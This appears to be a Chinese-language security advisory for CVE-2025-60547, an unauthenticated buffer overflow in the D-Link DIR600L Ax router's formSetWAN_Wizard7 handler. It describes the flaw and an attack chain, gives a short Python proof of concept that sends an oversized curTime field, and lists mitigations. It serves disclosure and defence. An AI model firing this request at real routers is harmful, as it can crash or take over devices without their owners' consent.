CVE-2025-60547 D-Link DIR600L Ax 路由器 formSetWAN_Wizard7 函数缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60547

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax (固件版本 FW116WWb01)

漏洞概述

CVE-2025-60547 是 D-Link DIR600L Ax 路由器固件中的一个高危缓冲区溢出漏洞。该漏洞存在于 formSetWAN_Wizard7 函数中，攻击者可以通过构造恶意的 curTime 参数值触发缓冲区溢出。由于该漏洞无需认证即可利用，且可通过网络远程触发，攻击者可以发送特制的 HTTP 请求到受影响设备的 Web 管理界面，从而导致设备拒绝服务（DoS）或可能实现代码执行。此漏洞影响使用 FW116WWb01 固件版本的 D-Link DIR600L Ax 设备，CVSS 评分达到 7.5 分，属于高危级别。攻击者无需任何用户交互即可发起攻击，这使得该漏洞具有较高的安全风险。

技术细节

该缓冲区溢出漏洞位于 D-Link DIR600L Ax 路由器的 formSetWAN_Wizard7 函数中。漏洞成因是函数在处理用户输入的 curTime 参数时，未对输入数据进行适当的边界检查。当攻击者向该函数提交超长的字符串作为 curTime 参数值时，会导致数据溢出到相邻的内存区域。在固件开发过程中，开发人员可能使用了不安全的字符串处理函数，如 strcpy、sprintf 等，而没有使用安全版本如 strncpy 或 snprintf，也没有进行长度验证。成功的缓冲区溢出利用可能导致以下后果：1) 覆盖返回地址，控制程序执行流程；2) 覆盖关键数据结构，造成拒绝服务；3) 在某些情况下可能实现远程代码执行。攻击者可以通过发送精心构造的 HTTP POST 请求到 /formSetWAN_Wizard7 端点来触发此漏洞。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标 D-Link DIR600L Ax 路由器，并确认其运行受影响的固件版本 FW116WWb01

STEP 2

步骤2

构造攻击载荷：攻击者构造包含超长字符串的 curTime 参数，用于触发 formSetWAN_Wizard7 函数中的缓冲区溢出

STEP 3

步骤3

发送恶意请求：攻击者通过 HTTP POST 请求向路由器的 /formSetWAN_Wizard7 端点发送特制的恶意数据，无需任何认证

STEP 4

步骤4

触发漏洞：恶意输入超出预期缓冲区大小，溢出数据覆盖相邻内存区域，可能包括返回地址和关键变量

STEP 5

步骤5

结果利用：成功利用可导致设备崩溃（DoS）或在特定条件下实现远程代码执行，攻击者获得设备控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60547 PoC - Buffer Overflow in D-Link DIR600L Ax formSetWAN_Wizard7
# Target: D-Link DIR600L Ax with firmware FW116WWb01

target_ip = "192.168.0.1"
target_port = 80

# Construct malicious payload with oversized curTime parameter
# This creates a buffer overflow condition
payload = {
    'curTime': 'A' * 1000,  # Overflow payload
    'Wizardx': '1',
    'submitFlag': 'wan_wizard7'
}

url = f"http://{target_ip}:{target_port}/formSetWAN_Wizard7"

try:
    print(f"[*] Sending exploit to {url}")
    print(f"[*] Payload length: {len(payload['curTime'])}")
    
    response = requests.post(url, data=payload, timeout=10)
    
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Length: {len(response.text)}")
    
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: Successful exploitation may cause device crash or reboot
# In some cases, carefully crafted overflow may lead to RCE

影响范围

D-Link DIR600L Ax 固件版本 FW116WWb01

防御指南

临时缓解措施

由于该漏洞存在于路由器固件中，临时缓解措施包括：1) 禁用路由器的 WAN 端 Web 管理界面，只允许 LAN 侧访问；2) 在网络边界部署防火墙规则，阻止外部访问路由器的 Web 管理端口（通常为 80/443 端口）；3) 监控路由器运行状态，发现异常及时重启恢复；4) 等待厂商发布官方安全补丁后立即更新固件。